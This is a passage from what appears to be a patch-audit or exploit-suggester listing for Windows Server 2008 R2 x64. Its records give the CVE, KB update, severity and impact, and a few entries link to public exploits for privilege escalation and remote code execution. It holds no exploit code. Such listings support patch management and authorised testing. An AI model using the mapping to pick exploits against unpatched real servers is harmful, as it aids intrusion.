Title: Vulnerabilities in Windows Fax Cover Page Editor Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploits: http://retrogod.altervista.org/9sg_cov_bof.html, http://www.exploit-db.com/exploits/15839

Date: 20120814
CVE: CVE-2012-2523
KB: KB2706045
Title: Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: VBScript 5.8
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-2523
KB: KB2706045
Title: Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: JScript 5.8
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20110412
CVE: CVE-2010-3974
KB: KB2506212
Title: Vulnerabilities in Windows Fax Cover Page Editor Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20110308
CVE: CVE-2011-0032
KB: KB2479943
Title: Vulnerabilities in Windows Media Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120214
CVE: CVE-2012-0149
KB: KB2645640
Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20120612
CVE: CVE-2012-0217
KB: KB2709715
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/28718/, https://www.exploit-db.com/exploits/46508/

Date: 20130409
CVE: CVE-2013-1338
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1338
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 8
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20121211
CVE: CVE-2012-1537
KB: KB2770660
Title: Vulnerability in DirectPlay Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20110913
CVE: CVE-2011-1991
KB: KB2570947
Title: Vulnerability in Windows Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20091013
CVE: CVE-2009-2510
KB: KB974571
Title: Vulnerabilities in Windows CryptoAPI Could Allow Spoofing
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Spoofing
Exploit: n/a

Date: 20091013
CVE: CVE-2009-2511
KB: KB974571
Title: Vulnerabilities in Windows CryptoAPI Could Allow Spoofing
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Spoofing
Exploit: n/a

Date: 20100608
CVE: CVE-2010-1879
KB: KB979482
Title: Vulnerabilities in Media Decompression Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Asycfilt.dll (COM component)
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110308
CVE: CVE-2011-0029
KB: KB2483614
Title: Vulnerability in Remote Desktop Client Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Remote Desktop Connection 7.0 Client
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20121113
CVE: CVE-2012-2531
KB: KB2716513
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft FTP Service 7.5 for IIS 7.5
Severity: Moderate
Impact: Information Disclosure
Exploit: n/a

Date: 20121113
CVE: CVE-2012-2531
KB: KB2719033
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Moderate
Impact: Information Disclosure
Exploit: n/a

Date: 20121113
CVE: CVE-2012-2532
KB: KB2716513
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft FTP Service 7.5 for IIS 7.5
Severity: Moderate
Impact: Information Disclosure
Exploit: n/a

Date: 20121113
CVE: CVE-2012-2532
KB: KB2719033
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Moderate
Impact: Information Disclosure
Exploit: n/a

Date: 20110111
CVE: CVE-2011-0027
KB: KB2419640
Title: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Data Access Components 6.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110111
CVE: CVE-2011-0026
KB: KB2419640
Title: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Data Access Components 6.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-3229
KB: KB2207566
Title: Vulnerability in SChannel Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1293
KB: KB2840149
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1293
KB: KB2808735
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100914
CVE: CVE-2010-2729
KB: KB2347290
Title: Vulnerability in Print Spooler Service Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101214
CVE: CVE-2010-3147
KB: KB2423089
Title: Vulnerability in Windows Address Book Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploits: http://www.attackvector.org/new-dll-hijacking-exploits-many/, http://www.exploit-db.com/exploits/14745/

Date: 20120508
CVE: CVE-2012-0161
KB: KB2604114
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0160
KB: KB2604114
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111108
CVE: CVE-2011-2016
KB: KB2620704
Title: Vulnerability in Windows Mail and Windows Meeting Space Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0162
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0162
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0162
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0165
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0165
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0165
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0164
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0164
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0164
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0167
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0167
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0167
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101214
CVE: CVE-2010-3338
KB: KB2305420
Title: Vulnerability in Task Scheduler Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121113
CVE: CVE-2012-1527
KB: KB2727528
Title: Vulnerabilities in Windows Shell Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120710
CVE: CVE-2012-1524
KB: KB2719177
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120710
CVE: CVE-2012-1522
KB: KB2719177
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20091013
CVE: CVE-2009-2524
KB: KB975467
Title: Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1294
KB: KB2813170
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121113
CVE: CVE-2012-1528
KB: KB2727528
Title: Vulnerabilities in Windows Shell Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20081111
CVE: CVE-2008-4033
KB: KB954430
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 4.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100810
CVE: CVE-2010-2554
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1868
KB: KB2535512
Title: Vulnerabilities in Distributed File System Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110208
CVE: CVE-2011-0091
KB: KB2425227
Title: Vulnerabilities in Kerberos Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121211
CVE: CVE-2012-2549
KB: KB2765809
Title: Vulnerability in IP-HTTPS Component Could Allow Security Feature Bypass
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Security Feature Bypass
Exploit: n/a

Date: 20110208
CVE: CVE-2011-0031
KB: KB2475792
Title: Vulnerability in JScript and VBScript Scripting Engines Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: JScript 5.8
Severity: Important
Impact: Information Disclosure
Exploit: n/a

Date: 20110208
CVE: CVE-2011-0031
KB: KB2475792
Title: Vulnerability in JScript and VBScript Scripting Engines Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: VBScript 5.8
Severity: Important
Impact: Information Disclosure
Exploit: n/a

Date: 20130409
CVE: CVE-2013-2014
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-2014
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 8
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1292
KB: KB2840149
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1292
KB: KB2808735
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1291
KB: KB2840149
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1291
KB: KB2808735
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1296
KB: KB2813347
Title: Vulnerability in Remote Desktop Client Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Remote Desktop Connection 7.0 Client
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-2013
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-2013
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 8
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-2730
KB: KB2124261
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-2730
KB: KB2271195
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120612
CVE: CVE-2012-0173
KB: KB2685939
Title: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0176
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0176
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0176
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120710
CVE: CVE-2012-0175
KB: KB2691442
Title: Vulnerability in Windows Shell Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120612
CVE: CVE-2012-1515
KB: KB2709715
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121211
CVE: CVE-2012-4774
KB: KB2758857
Title: Vulnerability in Windows File Handling Component Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20121113
CVE: CVE-2012-4776
KB: KB2729451
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20121113
CVE: CVE-2012-4777
KB: KB2729451
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100713
CVE: CVE-2009-3678
KB: KB2032276
Title: Vulnerability in Canonical Display Driver Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20121009
CVE: CVE-2012-2551
KB: KB2743555
Title: Vulnerability in Kerberos Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20121211
CVE: CVE-2012-2556
KB: KB2753842
Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20081111
CVE: CVE-2008-4029
KB: KB954430
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 4.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110209
CVE: SPSRV8R2X64SP1
KB: KBSPSRV8R2X64SP1
Title: Windows Server 2008 R2 for x64-based Systems Service Pack 1
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: No more updates
Exploit: n/a

Date: 20120508
CVE: CVE-2012-1848
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-1848
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-1848
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100511
CVE: CVE-2010-0816
KB: KB978542
Title: Vulnerability in Outlook Express and Windows Mail Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Live Mail 2011
Severity: Critical
Impact: Remote Code Execution
Exploits: http://archives.neohapsis.com/archives/bugtraq/2010-05/0068.html, http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=13&Itemid=13, http://www.securityfocus.com/bid/40052

Date: 20130212
CVE: CVE-2013-0073
KB: KB2789644
Title: Vulnerability in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130212
CVE: CVE-2013-0075
KB: KB2790655
Title: Vulnerability in TCP/IP Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130212
CVE: CVE-2013-0076
KB: KB2790113
Title: Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20120214
CVE: CVE-2012-0148
KB: KB2645640
Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20101012
CVE: CVE-2010-1263
KB: KB979687
Title: Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: WordPad
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-1263
KB: KB979688
Title: Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Shell
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-2745
KB: KB2378111
Title: Vulnerability in Windows Media Player Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Media Player 12
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-2746
KB: KB2296011
Title: Vulnerability in Windows Common Control Library Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20101214
CVE: CVE-2010-2742
KB: KB2207559
Title: Vulnerability in Windows Netlogon Service Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20100209
CVE: CVE-2010-0026
KB: KB977894
Title: Vulnerability in Windows Server 2008 Hyper-V Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20100413
CVE: CVE-2010-0024
KB: KB976323
Title: Vulnerabilities in Microsoft Exchange and Windows SMTP Service Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20100413
CVE: CVE-2010-0025
KB: KB976323
Title: Vulnerabilities in Microsoft Exchange and Windows SMTP Service Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1852
KB: KB2712808
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1852
KB: KB2705219
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1853
KB: KB2712808
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1853
KB: KB2705219
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1850
KB: KB2712808
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1850
KB: KB2705219
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1851
KB: KB2712808
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-1851
KB: KB2705219
Title: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-3223
KB: KB2294255
Title: Vulnerability in Windows Shared Cluster Disks Could Allow Tampering
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Moderate
Impact: Tampering
Exploit: n/a

Date: 20101012
CVE: CVE-2010-3227
KB: KB2387149
Title: Vulnerability in Microsoft Foundation Classes Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Moderate
Impact: Remote Code Execution
Exploit: http://www.exploit-db.com/exploits/13921/

Date: 20120214
CVE: CVE-2012-0150
KB: KB2654428
Title: Vulnerability in C Run-Time Library Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120412
CVE: CVE-2012-0151
KB: KB2653956
Title: Vulnerability in Windows Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120313
CVE: CVE-2012-0152
KB: KB2667402
Title: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120313
CVE: CVE-2012-0152
KB: KB2621440
Title: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0159
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0159
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
